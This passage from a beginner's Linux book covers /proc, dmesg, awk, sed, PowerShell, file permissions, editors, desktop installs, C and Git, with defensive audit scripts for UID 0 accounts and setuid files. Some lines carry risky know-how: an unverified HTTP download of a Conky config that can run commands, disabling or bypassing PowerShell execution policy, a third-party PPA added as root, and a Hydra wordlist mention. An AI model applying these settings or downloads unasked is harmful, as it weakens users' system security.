Note that ifconfig belongs to the older net-tools package; on current
distributions it is often not installed by default and the ip command (ip addr,
ip link set eth0 up) has taken its place.

/proc
As you may have guessed, /proc is not a command or tool. Instead it is a
directory in which the kernel exposes information on system memory, mounted
devices, hardware configuration, running processes and more. /proc is a
virtual filesystem: its files take up no space on disk and are generated by
the kernel at the moment you read them. A number of the commands I explained
earlier (ps among them) are little more than readers of files in /proc.
cpuinfo
Linux uses these virtual files to expose the current state of your machine.
cpuinfo is one of them and, as the name suggests, describes your processor:
the number of cores, the model name, the supported flags and the clock speed.
username@ubuntu:~$ cat /proc/cpuinfo
filesystems
username@ubuntu:~$ cat /proc/filesystems
This lists the filesystems supported by your kernel.
meminfo
username@ubuntu:~$ cat /proc/meminfo
This displays a summary of how the kernel is managing your system memory.
version
username@ubuntu:~$ cat /proc/version
Linux version 4.2.0-23-generic (buildd@lcy01-30) (gcc version 5.2.1
20151010 (Ubuntu 5.2.1-22ubuntu2) ) #28-Ubuntu SMP Sun Dec 27
17:47:31 UTC 2015
This shows the running kernel version and the compiler that was used to build
it. Some of this information you may recognize from the uname -a command.

/dev
The /dev directory on Linux is interesting in that it shows that everything on
Linux is indeed a file. If you navigate to /dev and use ls -l you will see what
I mean. You should see your hard drive partitions represented as sda1, sda2
and so on, and there should be more, such as your DVD drive (sr0). On older
systems that still have the OSS sound device /dev/dsp, cat /boot/vmlinuz >
/dev/dsp plays the kernel image through your speaker: the sound of your
kernel. Most current systems no longer have /dev/dsp, so don't be surprised if
the command fails. With the following two commands you will be able to see
what the kernel has been doing, which is invaluable for debugging.
dmesg
With dmesg (display message) you print the kernel's message buffer. When Linux
starts, the kernel initialises the device drivers, and while the system boots
their messages scroll past far too fast for anyone to read. With dmesg you can
read them afterwards. In everyday use the command is handy to see whether a
hardware device has been recognised: unplug your mouse or keyboard while you
are reading this and dmesg will report the fact the next time you run it.
username@ubuntu:~$ dmesg
As you will see the amount of output is not trivial; it pushes your previous
commands off the screen for many pages. We can use tail to limit the output.
username@ubuntu:~$ dmesg | tail
This prints only the last 10 kernel messages. There is also a corresponding
head command, which keeps only the first 10 lines. Both head and tail work with
any other command in combination with a pipe |.
On many current distributions reading the kernel log is restricted to root
(the kernel.dmesg_restrict sysctl), because the buffer can leak kernel
addresses and hardware details that are useful to an attacker; if dmesg
answers "Operation not permitted", run it with sudo.
To sum up, dmesg is a wonderful diagnostic tool. It shows you if something
goes wrong with your hardware drivers and the language is easy to understand.
If you ever ask for help on the internet about a problem, you can do a lot
worse than showing people your dmesg output.
cu
With cu (call UNIX) you can connect to another UNIX system over a serial line
or modem. These days cu is hardly used for that purpose. Instead it is a
convenient way to read what comes in over a non-network connection, typically
a serial port, for instance a USB-to-serial adapter attached to a TV, a hobby
board or a smart meter. I use cu to just perform diagnostics and see if any
usable information is coming through. An example is reading data coming from
a smart meter.
username@ubuntu:~$ cu -l /dev/ttyUSB1 -s 9600 --parity=none
The meter was connected to my USB port. With -l I indicate the device I want
cu to listen to and with -s I set the speed of the connection, in this case
9600 baud. Cu then prints whatever arrives over the connection onto the
terminal. Opening the device usually requires membership of the dialout group
or root privileges.
Running applications in the background
Finally there are two additions to a command that power users will find
interesting. The first, the ampersand sign &, makes an application run in the
background so that you can continue working in the same terminal.
username@ubuntu:~$ ./program &
The second, nohup, ensures that an application is not stopped when you log out
while the computer keeps running. This is helpful if you want a program to run
continuously to make it accessible to others, or if it is performing a long
calculation. If you switch off the computer the program does of course stop,
and it won't restart unless you start it again.
username@ubuntu:~$ nohup ./program &
nohup literally stands for "no hang-up": it makes the program ignore the SIGHUP
signal that the shell sends to its jobs when the terminal goes away, and it
writes the program's output to nohup.out if that output would otherwise go to
the terminal. An alternative to nohup is screen, which runs commands inside a
terminal session that you can detach from and reattach to later (tmux is a
popular modern equivalent). Screen is not recommended for beginners, though.
As the last example shows, nohup and the ampersand can be combined: the
application then runs in the background and survives your logging out.

On AWK
Awk is a programming language in which you write very small programs to parse
and extract text from files. There are some similarities to grep, but awk is a
lot more versatile. Awk is one of those UNIX staples, just like sed (next
paragraph), that refuses to die. Chances are you may never need awk, but if a
programmer before you created a little script with it you may have to adjust
it for a new purpose. So let's try awk. First write a small .txt file with
gedit that contains a few sentences. For example the following two lines will
do just fine.
You will be a Linux awk in no time,
Especially if you also learn sed
With awk we can choose precisely what we want to read from a text and use that
as input for something else, but first let's return everything.
username@ubuntu:~$ awk '{ print }' test.txt
Now both lines are printed in full. The spaces around print are optional; awk
'{print}' works just as well. We can also choose to return just the first
column. Imagine every word in both sentences has its own column, just like a
spreadsheet.
username@ubuntu:~$ awk '{ print $1 }' test.txt
In this awk program $1 stands for column (field) 1. The result of this command
is
You
Especially
This shows that awk is well suited to working with data files. Imagine reading
a CSV export of a spreadsheet with awk. We can also return more than one
column. With awk '{ print $1, $2 }' test.txt we return the first two, separated
by a space (the comma inserts the output field separator). With awk '{ print
$1 $2 }' test.txt, without the comma, the two fields are concatenated and
returned as though they were one word.
Youwill
Especiallyif
Awk performed these commands with the understanding that whitespace delimits
the fields in our file. Plenty of other delimiters are possible. To use them we
need to specify them, as whitespace is the default. To use the comma as
delimiter:
username@ubuntu:~$ awk -F',' '{ print $1,$2,$3 }' test.txt
With the switch -F we specify the character that separates the fields.
Awk can also accept more elaborate criteria to select parts of a text. A useful
way to do that is through a regular expression, which I elaborate on in the
next paragraph. A pattern placed before the braces acts as a filter: only the
lines matching it reach the action. To print every line that does not contain
punctuation such as commas, exclamation or question marks, negate the pattern
with !.
username@ubuntu:~$ awk '!/[.,!?]/ { print }' test.txt
Of our two lines only the second is printed, since the first ends in a comma.
More complicated awk programs can be saved in scripts. Remember, awk is a fully
functional programming language: it has variables, loops and conditional
statements. You can place the following lines in a file with .awk as
extension.
#!/usr/bin/awk -f
BEGIN {
    x = 1
    while (x <= 5) {
        if (x == 4) {
            print "Hello, World!"
        }
        x++
    }
}
After you have saved it you can run the program as follows
username@ubuntu:~$ awk -f testscript.awk
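As an added example, not from the book, here is the same field selection, -F and pattern filtering turned into a small account audit. The input is a constructed passwd(5)-style listing embedded in the script (the accounts, UIDs and the planted toor entry are invented) and the function names are assumptions of the example. To run it on a real system, feed /etc/passwd to the same awk programs.

```shell
#!/usr/bin/env bash
# Added example, not from the book: awk over a constructed /etc/passwd-style
# listing. The accounts are made up; "toor" is planted as the kind of entry an
# audit should catch. On a real system: awk -F: '...' /etc/passwd

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:backdoor:/root:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh'

# Fields of passwd(5), colon separated: 1 name, 3 UID, 7 login shell.
# Any account other than root with UID 0 has full root rights.
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Accounts that can log in interactively: shell not nologin or false.
# The pattern before the braces filters lines; "!~" means "does not match".
login_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $7 }'
}

# How many accounts use each shell: an associative array filled per line,
# printed in the END block once all input has been read.
shell_counts() {
    awk -F: '{ n[$7]++ } END { for (s in n) print n[s], s }' | sort -rn
}

printf '%s\n' "$SAMPLE_PASSWD" | extra_uid0        # toor
printf '%s\n' "$SAMPLE_PASSWD" | login_accounts    # four name:shell lines
printf '%s\n' "$SAMPLE_PASSWD" | shell_counts
```

The first program is the check worth remembering: a second UID 0 account is a classic way of keeping root access after a compromise, and awk finds it in one line.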

On SED
With sed, the Stream Editor, you can parse and transform text in a pipeline. It
is a small scripting language that reads its input line by line, applies your
commands to each line and writes the result out. Sed dates from the early
1970s and is modelled on the line editor ed, itself a descendant of the older
qed. With sed we use regular expressions to search for and transform text.
Regular expressions are well established text search patterns that are
available across many operating systems and programming languages. Sed
commands don't have to be typed on the command line; you can also write them
in a file, just like awk. So let's try out sed. A simple sed command is word
substitution. With the following command we change the first occurrence of the
word dog on each line into cat and place the output in a new file.
Shown below is the input. On the second line I have written down variations of
dog: with a capital letter, with and without a comma.
How much is that dog in the window
Dog, dog, Dog Doggie and cat
This is saved in dog.txt
username@ubuntu:~$ sed s/dog/cat/ < dog.txt > cat.txt
The output becomes
How much is that cat in the window
Dog, cat, Dog Doggie and cat
Notice that only the first lowercase dog on each line was replaced: the s
command is case sensitive and, without the g flag, stops after the first
match. Also notice the use of both redirect signs < and >. I could have used a
variation with the cat command
username@ubuntu:~$ cat dog.txt | sed s/dog/cat/ > cat.txt
Regular expressions are not everyone's favorite topic. With the advent of GUI
text editors they have fallen out of favor for manual command line use, but
programs still use them. Sed may be a programming language, in that it has
branching, loops and conditions, but it is not generally used to write
complicated applications. Sed scripts are used when work becomes complicated
or repetitive. Nonetheless, a few die-hards have created games such as chess
and Tetris using sed.
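The following is an added example, not the book's code, that extends the dog/cat substitution. It shows on constructed input (the three lines are made up, including a hotdog line to provoke the edge case) why s/dog/cat/ replaces so little, what the g flag and a bracket expression add, and how to stop the pattern from eating Doggie. The function names are assumptions of the example.

```shell
#!/usr/bin/env bash
# Added example, not from the book: sed substitutions on a constructed version
# of the dog/cat text, tightening the pattern step by step. Input is made up.

SAMPLE_TEXT='How much is that dog in the window
Dog, dog, Dog Doggie and cat
hotdog dog dog'

# The command from the text: first lowercase "dog" on each line, nothing else.
naive_sub() {
    sed 's/dog/cat/'
}

# Bracket expression for either case, g flag for every occurrence on the line.
# Too eager: it also turns the "Dog" inside "Doggie" into "catgie".
global_sub() {
    sed 's/[Dd]og/cat/g'
}

# Require that dog is followed by a non-letter or the end of the line, and put
# that character back with \1. -E enables extended regex (groups and |).
# "Doggie" is now left alone; "hotdog" still matches, since only the right-hand
# side is checked. GNU sed's \b would cover both sides but is not portable.
word_sub() {
    sed -E 's/[Dd]og([^A-Za-z]|$)/cat\1/g'
}

# sed as a filter: -n suppresses the default print and the /regex/p address
# prints only lines that still mention a dog, a quick way to check your work.
leftover_dogs() {
    sed -n '/[Dd]og/p'
}

printf '%s\n' "$SAMPLE_TEXT" | naive_sub
printf '%s\n' "$SAMPLE_TEXT" | global_sub
printf '%s\n' "$SAMPLE_TEXT" | word_sub | leftover_dogs   # cat, cat, cat Doggie and cat
```

When you are happy with a substitution, GNU sed's -i switch applies it to the file in place instead of writing to stdout; test without -i first, exactly as done here.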

Figure 34. Hackers 1995

EXTRA:
Hackers:
Too Cool To Die
Just like The Net, also from 1995, Hackers became an instant cult classic. The
movie stars Jonny Lee Miller as hacker Dade Murphy, a.k.a. Crash Override,
and Angelina Jolie as Kate Libby, a.k.a. Acid Burn. The two quickly develop a
rivalry, and the movie follows their antics, such as taking down a large
corporation and harassing the Secret Service. Hackers does fall significantly
short of greatness. The often slapstick humor and the dated fashion made it
feel obsolete within a few years of its release, especially compared to The
Matrix. Yet it is also a wonderful trip down memory lane for those who grew
up in the 90s. Hackers correctly depicts the tactics used by the US Secret
Service in pursuing computer vigilantes.

Figure 35. Jonny Lee Miller as Crash Override
The movie nonetheless has themes and issues that are still relevant more than
20 years on. The character The Plague points out that the most commonly used
passwords are God, Sex, Love and Secret. Today most systems require at least
one capital letter and one digit, so in theory a valid password could be
Secret1. That won't give most attackers much trouble with a tool such as Hydra
fed a wordlist of common passwords and their obvious variations; length and
unpredictability, not a token capital and digit, are what make a password hard
to guess.

Figure 36. Acid Burn displaying her skillz


The reference to RISC CPU design becoming dominant for desktop computers did
not come true. Implementations such as SPARC were defeated by Intel's deeper
pockets, which allowed it to update its Pentium designs faster than any of its
competitors. RISC is still around, though: nearly all embedded computers and
smartphones use RISC designs such as ARM. SPARC has seen a revival, but mostly
in high-end supercomputers. Just like in The Net, Kate (Acid Burn) uses a Mac
PowerBook Duo 270c with a 33 MHz processor, 4 MB of RAM and a color screen! A
far cry from the powerful computer she claims it to be.

Figure 37. Angelina Jolie as Acid Burn


Hackers may not be great, but it is good enough for a revisit. Just steer clear
of its unofficial sequels such as Takedown. The only things that have remained
etched in my mind are the songs Halcyon On and On by Orbital and One Love by
The Prodigy. Together they symbolize growing up in the mid 90s, in a world
moving from portable CD players to the Internet. Hackers recently saw its first
Blu-ray release, marking its 20th anniversary. Check it out if you want to.

PowerShell
After going through almost four chapters on Linux and its command line I think
readers should be reminded of the possibilities that Windows offers. Most
readers who use Windows are familiar with the black-screened CMD terminal, but
since the introduction of PowerShell in 2006 the Microsoft family of operating
systems has its own full-featured tool for users to control their system
directly.
In 2006 Microsoft finally gave Windows professionals the tool they had long
been craving: Windows PowerShell. Just like a Linux or Mac command line it lets
users automate tasks and manage configuration. PowerShell comes with its own
scripting language, built on the .NET framework. In PowerShell tasks are
performed by cmdlets (pronounced command-lets), .NET classes that can be
combined into scripts and pipelines. The big difference from CMD and from UNIX
shells is that what flows through a PowerShell pipeline is not text but .NET
objects with properties you can filter and sort on.
In your Windows start environment you can find PowerShell by typing its name in
the search bar, just like CMD. And as in CMD and Linux you can use most of the
familiar commands in PowerShell. By typing DIR or ls you get an overview of
your present directory. The default directory is C:\Users\Name. The PowerShell
cmdlet behind DIR and ls is Get-ChildItem. Luckily we do not need to type the
entire name; gci suffices. Most cmdlets have such an alias, and DIR and ls are
simply two more aliases for Get-ChildItem.

Figure 38. Using DIR, LS and Get-ChildItem on the same directory
To make PowerShell print out Hello, World! just enter the following line
PS C:\Users\username> Write-Output "Hello, World!"
This writes the string to the pipeline, which at the prompt means it is
printed in your shell. Most PowerShell cmdlets are written out in words, but
there is a short alias for most of them. Type gci to list files and
directories, and write or echo to send a string to the output.
If you use the PowerShell environment as just another version of CMD or as a
Linux terminal on Windows you will miss many of the functions it offers. To
create scripts you can use PowerShell ISE. Open it and create a new file. You
can add the line Write-Output "Hello, World!" from above without any
additional command. You can add the line Sleep 5 (an alias for Start-Sleep) to
make the program pause for 5 seconds before ending and returning control to the
command line[4].
Your first PowerShell program should look something like

Write-Host "Hello world!"
Sleep 5
Write-Host "Goodbye!"

Save it to the Desktop and note the .ps1 extension the file has received.
Before you can run the script you may have to change the execution policy,
which on client versions of Windows refuses to run any script by default.
Restart PowerShell as administrator (right-click and select 'Run as
Administrator'), then input the following command and press Enter.
PS C:\Users\username> Set-ExecutionPolicy Unrestricted
Type Y to confirm. For your own scripts RemoteSigned is the better choice: it
runs scripts written or saved locally but requires a signature on scripts
downloaded from the internet, whereas Unrestricted runs those too after a
warning. Either way, keep in mind that the execution policy is a guard against
accidentally running scripts, not a security boundary; anyone who can start
powershell -ExecutionPolicy Bypass steps around it. You can now start your
first PowerShell program. Navigate to the Desktop and enter your program name.
Tab completes it and also adds the .\ prefix that PowerShell requires for
scripts in the current directory.
The program does pretty much what you would guess. It displays line 1, waits
for 5 seconds and then displays the second line before terminating. In
PowerShell you can also chain commands together with pipes. CMD could pipe
text between commands too, but PowerShell passes whole objects along the
pipe, so the next cmdlet can work with named properties instead of parsing
columns of text.
Note that the script uses Write-Host rather than Write-Output. Write-Host
writes directly to the console and its text cannot be captured by a pipe or
redirect, whereas Write-Output feeds the pipeline; the old CMD echo command
survives as an alias, but of Write-Output, not of Write-Host. For clarity use
the full cmdlet names when creating PowerShell scripts; that makes them much
clearer for other users. If you need help with a cmdlet use Get-Help. To see
the help page for Get-Help you would input
Get-Help Get-Help
With PowerShell you can perform a number of household tasks. Below are a few.
Notice the pipes, just like in Linux. The first cmdlet sequence lists all
running processes and shows them in a new window through the Out-GridView
cmdlet.
Get-Process * | Out-GridView
The following sequence lists the log files on your system drive
Get-ChildItem C:\ -Recurse -Include *.log | Out-GridView

-WhatIf and -Confirm switches
Just like Linux commands, many PowerShell cmdlets have optional switches. In
addition PowerShell itself defines a set of common parameters, and two of
them, -WhatIf and -Confirm, are available on every cmdlet that changes the
state of the system (Stop-Process, Remove-Item and the like).
By placing -WhatIf behind a command you tell it not to execute, but instead to
report what would happen if the cmdlet were run. In essence you are doing a
dry run. This lets you test a command without running it, which saves you the
trouble of setting up your test situation again, and it is a habit worth
having before any Remove-Item -Recurse. The example below shows what would
happen if I tried to kill a program.
First, start a program such as WordPad. It is a non-essential program. I
usually have a tile linking to it in my start page. After this is done I use
the Get-Process cmdlet to find the corresponding process.
As shown in the screenshot below, on my PC at the time the process ID is 2092
and the ProcessName is simply wordpad. Afterwards I used the ID with the cmdlet
Stop-Process and the -WhatIf switch to see what would happen.

Figure 39. The -whatif switch detailed


If I really wanted to end WordPad I would omit -WhatIf. Instead I replace it
with the -Confirm switch to make the system ask for permission before carrying
out the task.

Figure 40. The -Confirm switch follow-up
After I have confirmed the prompt the cmdlet runs and WordPad stops instantly.

Chapter 4 Text Editors and Desktop environments

Paragraph 1. File Permissions
1.1 chmod
Not every file in Linux is readily accessible to everyone. The owner of a file
(and root, who may change anything) decides who may read its content, write to
it and execute it as a program; the abbreviations for these are r, w and x.
Permissions are set for three classes: the owning user, the owning group and
all others. With ls -l you can check which rights are currently set on a file;
the first column shows them as three rwx triples in that order. If you run into
a permission error and are in a hurry, the tempting command is
username@ubuntu:~$ chmod 777 filename

This assigns all rights to everyone, and it is almost always the wrong fix:
anyone on the system can now alter or replace the file, which for a script or
a configuration file means they can run code as whoever uses it. Assign only
the rights each class actually needs, for example 600 for a private key or
password file and 755 for a program. Each digit of the numeric mode is the sum
of read (4), write (2) and execute (1); see the table below for all
combinations.
7 read, write and execute
6 read and write
5 read and execute
4 read only
3 write and execute
2 write only
1 execute only
0 none
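As an added example, not from the book: the table's numeric modes applied to temporary files and read back with ls -l, followed by the two find checks a security reviewer runs to catch what chmod 777 and careless setuid bits leave behind. Every file it touches lives in a scratch directory it creates itself; the file names and the helper name are assumptions of the example.

```shell
#!/usr/bin/env bash
# Added example, not from the book: numeric modes applied to scratch files and
# two permission audits with find. All files are created in temporary
# locations made for the example and removed again.

# Apply an octal mode to a fresh temporary file and return the rwx part of
# the ls -l listing, so the digit -> rwx mapping can be checked by eye.
mode_string() {
    f=$(mktemp)
    chmod "$1" "$f"
    ls -l "$f" | cut -c2-10      # columns 2-10 hold the owner/group/other triples
    rm -f "$f"
}

# Build a scratch directory with files in several modes, including one with
# the setuid bit (4xxx), which makes a program run as its owner whoever
# starts it. Prints the directory path.
demo_dir() {
    d=$(mktemp -d)
    for m in 600 644 666; do
        : > "$d/file_$m"
        chmod "$m" "$d/file_$m"
    done
    : > "$d/helper"
    chmod 4755 "$d/helper"
    printf '%s\n' "$d"
}

# Files anyone on the system may modify: -perm -0002 tests the "others write"
# bit regardless of the remaining bits.
audit_world_writable() {
    find "$1" -type f -perm -0002 | sed 's#.*/##' | sort
}

# Files with the setuid bit set; on a real system each one deserves a second
# look, because it is a potential way to become its owner, often root.
audit_setuid() {
    find "$1" -type f -perm -4000 | sed 's#.*/##' | sort
}

mode_string 755              # rwxr-xr-x
mode_string 600              # rw-------
scratch=$(demo_dir)
audit_world_writable "$scratch"   # file_666
audit_setuid "$scratch"           # helper
rm -rf "$scratch"
```

Run the two audit functions against / (with sudo, and expect a long list of legitimate setuid binaries such as passwd and sudo itself) to see what a real system looks like; anything world-writable outside /tmp or setuid outside the package-managed paths is worth explaining.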

1.2 chown
With chown we can change the user and/or group ownership of a file or
directory. Changing ownership requires root. The permission bits themselves
stay as they are, but because the rwx triples apply to the owner and the
group, handing a file to a different owner changes who those bits grant access
to.
username@ubuntu:~$ chown root file
Changes the file's owner to root
username@ubuntu:~$ chown root /folder
Changes the folder's owner to root
username@ubuntu:~$ chown root:members file
Changes the file's owner to root and its group to members
username@ubuntu:~$ chown root:members /folder
Changes the folder's owner to root and its group to members
chown accepts a number of flags; place them before the new owner.
-R, used with a folder, recursively changes all files beneath it. -v gives
verbose output; -c reports only the files that were actually changed.

Paragraph 2. Vi and EMACS
Up until now we have used gedit as the standard text editor. In fact, gedit is
also available for download on Mac OS X and Microsoft Windows. Despite that,
gedit may not be available on every Linux distribution, and on a server without
a graphical desktop or an internet connection you won't be able to install it.
It is thus time to check which terminal text editor is installed in /usr/bin.
Chances are either Vi, Vim (Vi Improved), EMACS or nano is present. In this
chapter we will discuss Vi/Vim and EMACS, the two most popular text editors
for Linux and the two camps of the ongoing editor wars. EMACS can be
complicated to learn, and some have suggested that users new to Linux should
start with Vi or Vim, so this paragraph is written in that order.

2.1 Vi/Vim
Vi is a text editor written by Bill Joy in 1976. All interaction with Vi occurs
in the terminal and the cursor keys (or h, j, k and l) are used for
navigation. Just like with gedit you can open a file that doesn't exist yet by
naming it after the vi command.

username@ubuntu:~$ vi hellovi.txt

What you will see is an empty file where every line starts with a tilde sign ~.
These mark lines beyond the end of the file and won't be part of the file once
saved.

Vi won't let you type right away, because it starts in command mode, where
keys are commands rather than text. You can use the cursor keys to move
around; press i to enter insert mode and type your text. After you have
finished typing or altering the file press Escape to return to command mode.
Notice that if you type a colon now, what follows appears at the bottom of the
terminal almost like a command line. Here you enter commands that tell Vi what
to do with the file.
To save the file and exit Vi type :wq. As you may guess, :q exits Vi without
writing the changes, though Vi will refuse if there are unsaved changes. If Vi
objects to a request to quit you can add a bang (!) to the command: :q!
definitely quits Vi, discarding your changes.

A popular successor of Vi is Vim, which stands for Vi Improved. Vim adds,
among much else, syntax highlighting, an optional graphical front end (gVim)
and its own scripting language, Vimscript, which is influenced by shell
scripting. One major advantage of Vim over classic Vi is that you can keep
multiple windows open inside one session. Previously you had to open a new
terminal to start another instance of Vi, and two instances were never
connected. With the candy-colored sections of text and code, making sense of
multiple Vim windows takes some getting used to, though. On many Linux
systems today the vi command actually starts Vim.

2.2 EMACS
Another very important text editor for Linux is EMACS. It was written back in
1976 by Richard Stallman (founder of the free software movement) and Guy L.
Steele, Jr. EMACS is not an easy text editor. Over the years its functionality
has grown enormously. Some users have quipped that the best way to learn
EMACS is through Vim.
If your version of Linux does not come with EMACS installed just type in
username@ubuntu:~$ sudo apt-get install emacs24
Once installed you can run the editor and open a file at once by typing in
username@ubuntu:~$ emacs file
Most EMACS commands make use of the Control (Ctrl) key in combination with
another key. For example: after you start EMACS, hold down Control and press h
for help. This key combination is written C-h.
If you initially started EMACS without naming a file you can create or open
one with
C-x C-f
You are then prompted for a filename.
After you have finished editing a file you can save the changes with
C-x C-s
You can find it in your directory under the name you used to open it.
To close down EMACS use
C-x C-c
It will however prompt you to save any unsaved changes first.
Beyond these basic operations EMACS has a whole slew of text editing hotkeys,
most well beyond the scope of this text. It has led Vi/Vim advocates to joke
that EMACS is 'a great operating system, lacking only a decent editor'. This
is not much of an exaggeration: with Emacs Lisp, a dialect of the Lisp
programming language, users can extend the editor with custom commands and new
key bindings.
Below is an example of Lisp, the Hello, world! program. It is written in
Common Lisp, a different dialect from Emacs Lisp, so it is run with a separate
interpreter rather than inside EMACS, but the syntax is the same. Place the
code in a file called helloworld.lisp with your favorite text editor.
; hello world lisp program.
(print "Hello, world!")

Make sure you have the clisp interpreter/compiler installed with
username@ubuntu:~$ sudo apt-get install clisp
Then run the example as follows
username@ubuntu:~$ clisp helloworld.lisp
Output should be
"Hello, world!"
with the quotes included, because print writes its argument in a form that
Lisp can read back; use princ instead of print if you want the bare text.

Concluding remarks on your choice of text editor
There are plenty of other text editors for Linux: nano, Geany and Jed, just to
name a few. There is no point in getting familiar with all of them. I suggest
concentrating on getting to know either Vi/Vim or EMACS well beyond the
commands I mentioned here. However, with what you have learned in this chapter
you will be able to do the basics: change files and save them. Few
professionals expect people to know more commands than the ones I have taught
you by heart. The choice of text editor is a personal one, and I think ease of
use should be a priority.

Paragraph 3. A new Desktop environment
Installing Cinnamon
Chances are that if you use Ubuntu you have had enough of the Unity interface.
It certainly wasn't Mark Shuttleworth's best idea. There are plenty of
alternatives to Ubuntu. One of them is Linux Mint, which started as an Ubuntu
fork but has become, to some, the more important of the two. Mint comes with a
choice of several desktop environments, the graphical user interface of the
OS. One of them is Cinnamon, a plain, Windows-like interface that is easy to
use. Cinnamon can also be installed on Ubuntu. This extra content to the book
describes how, with the following commands
sudo add-apt-repository -y ppa:gwendal-lebihan-dev/cinnamon-nightly
sudo apt-get update
sudo apt-get install cinnamon
A word of caution before you run them: a PPA is a third-party package source.
Its packages are installed as root and its signing key is trusted for
everything the maintainer publishes afterwards, so only add repositories whose
maintainer you trust, and remove them once you no longer need them (the -r
step below does that).
The next time you start Ubuntu the login screen asks which environment you
want.
Just as important as installing Cinnamon is uninstalling it if the environment
doesn't feel right to you. This can be accomplished with the following two
commands.
sudo apt-get purge cinnamon* nemo-* cjs muffin* python-nemo
sudo add-apt-repository -r ppa:gwendal-lebihan-dev/cinnamon-nightly
Cinnamon is but one possible interface for your OS. Other options include
MATE, GNOME, KDE and LXDE. There are also graphical shells that run on top of
an existing environment: Cinnamon started out as a shell on top of GNOME, and
Unity was built on GNOME in the same way.

Installing Conky
An ordinary Linux desktop can look quite boring, even with Cinnamon installed.
Conky is a system monitoring package that displays all vital stats on the
desktop. In its barebones edition it is quite plain, but Conky is easily
adjusted and plenty of developers have released their own variants. One of the
most popular is the Red, Gray and Orange set from NoobsLab, downloaded and
unpacked like this
cd && wget -O orangec-noobslab-u.zip http://drive.noobslab.com/data/conky/Red-Gray-Orange/conky-orange.zip
unzip orangec-noobslab-u.zip && rm orangec-noobslab-u.zip
Two things to note before you use such a download. The file arrives over plain
HTTP, so nothing guarantees it is what the author uploaded, and a Conky
configuration can run arbitrary shell commands (its ${exec} and ${execi}
variables exist for exactly that). Read through the configuration and any
scripts in the archive before you let Conky load them.

Paragraph 4. Introduction to programming
The final discussion point of this part of the book is programming on Linux.
Officially that is the topic of the next part, but it is difficult to discuss
without detailing the commands used to compile and run a new program, so I
might as well teach you how to program along with it.
Linux comes with the open-source compiler GCC, which stands for GNU Compiler
Collection. With it you can compile code written in various programming
languages such as C, C++, Objective-C and Fortran. In the example below I show
you how to compile a very simple 'Hello, World!' program. First we need source
code. Source code is written by the programmer in a logical notation that
resembles mathematical statements. It is meant to be readable by people, and
your CPU cannot execute it directly. The program first has to be compiled into
object code and linked into an executable binary that the computer can run.
So let's write a program. Use gedit to open a file called 'helloworld.c'. The
extension '.c' makes it clear this is source code written in the C programming
language. After you have opened the file you can write your very first program
(if you exclude the AWK examples from the previous chapter).
/* Hello World program */

#include <stdio.h>   /* declares printf */

int main(void)
{
    printf("Hello World!\n");   /* \n ends the line so the prompt starts on a new one */
    return 0;                   /* exit status 0 tells the shell the program succeeded */
}
Be sure to copy the code exactly. Copying source code from a text book is
notoriously boring and time-consuming, but if you make a typo it will not
compile. The program itself is simple. With int main we define the entry
point: every C program has such a function and most other languages have a
similar construct. The program then executes every statement between the two
curly braces { }. The statement 'printf("Hello World!");' calls the function
printf, a ready-made piece of code everybody uses. printf is declared in the
header stdio.h, which is why there is a #include line at the top; the code
itself lives in the C standard library that gcc links in for you. printf
displays whatever is between the quote marks on the terminal, in this case
the words Hello World! Now we can compile the program. Remember where you
saved helloworld.c!
username@ubuntu:~$ gcc helloworld.c -o helloworld
The command structure is simple. We call gcc and tell it to compile the file
helloworld.c. If we leave it at that, gcc does compile the file but stores the
binary under the default name a.out. That works, but every later compilation
overwrites the same a.out. The -o flag says we want the compiler output saved
as helloworld instead.
If everything went correctly we can run our program as follows
username@ubuntu:~$ ./helloworld
As output you should see the sentence Hello World! printed in the terminal.
Congratulations, you have just created your first little program!

EXTRA: Introduction to Git & GitHub

GitHub is a hosting service for source code repositories. Developers use it to
organize projects and ensure that every participant works from one common
version of a project. Each developer keeps a copy of the code on their own
computer and uses the Git version control system to exchange changes with the
online repository (repo). Git was written by Linus Torvalds in 2005 after the
Linux kernel project lost its free use of the proprietary BitKeeper system it
had relied on until then.

Creating a GitHub account and a repo
To store your program source code on GitHub you first need an account.
Creating one is easy: go to https://github.com/, click the green 'Sign up'
button and fill in the necessary details. Do keep a note of your login name,
email address and password. Once you have an account you need to create a new
repo to store your project. In the main screen of your account click the green
'+ New Repository' button, choose a name such as hackbook and make the repo
public. Keep in mind that public means exactly that: everything you push,
including anything that was in the files by mistake, is visible to the whole
world. Now click 'create repository'. After the repo has been made you are
shown a selection of options for adding files from your computer to the online
repo. This guide will show you how that is done.

Figure 41. The GitHub start website

Installing and configuring Git
First you need to install the Git version control system on your Linux
machine. Type the following command into your Terminal.
sudo apt-get install git
After the installation completes, use the following two commands to configure
your identity. Use the username and email address you registered with the
GitHub account. Both values are recorded in every commit you make, and commits
in a public repo are public, so do not use an address you would rather keep
private.
git config --global user.name "username"
git config --global user.email "email address"
Now create a directory on your Linux machine in which you can work on your
program and from which you will upload it to GitHub. Create a directory called
hackbook, navigate into it and then use git init to initialize it as a Git
repo.
mkdir hackbook
cd hackbook
git init
The output will read as follows
Initialized empty Git repository in /home/user_name/project_name/.git/
The path depends on your own Linux machine and folder name. We are now set to
create a file in the local repository and place it on the remote GitHub repo.
First we need a file. Just create a small text file, or even a Markdown file
(.md), and write something in it.

Updating the local repository
Before files are sent to GitHub they are first placed in a staging area (also
called the index) on your computer. With the command git add you add files to
the staging area. Use a dot '.' to stage everything in the current directory,
or name a single file (Tab will autocomplete it) if you only want to stage
that one.
git add .
With the git commit command you record what is in the staging area as a new
version in your local repository, once you have no further alterations
planned. This split between working files, staging area and local repo lets
you review exactly what goes into a version and back out if you change your
mind. It comes at the cost of some complexity.

Figure 42. Git and GitHub model


Astute readers will note a problem. Sending files to GitHub this way is easy
if you are the only one maintaining the project. With more than a few
contributors the situation quickly becomes complicated, as nobody is sure
whose version of the software is current. That is covered in the second half
of this tutorial. First we still need to send the files to the remote repo on
GitHub.

Before you commit the files from your directory you can use git status to see
whether there is anything to commit. It is best to commit often so your local
repo always reflects your work.
git status
This returns the following output
On branch master
Initial commit
Changes to be committed:
(use "git rm --cached <file>..." to unstage)
new file: testHackBook.MD
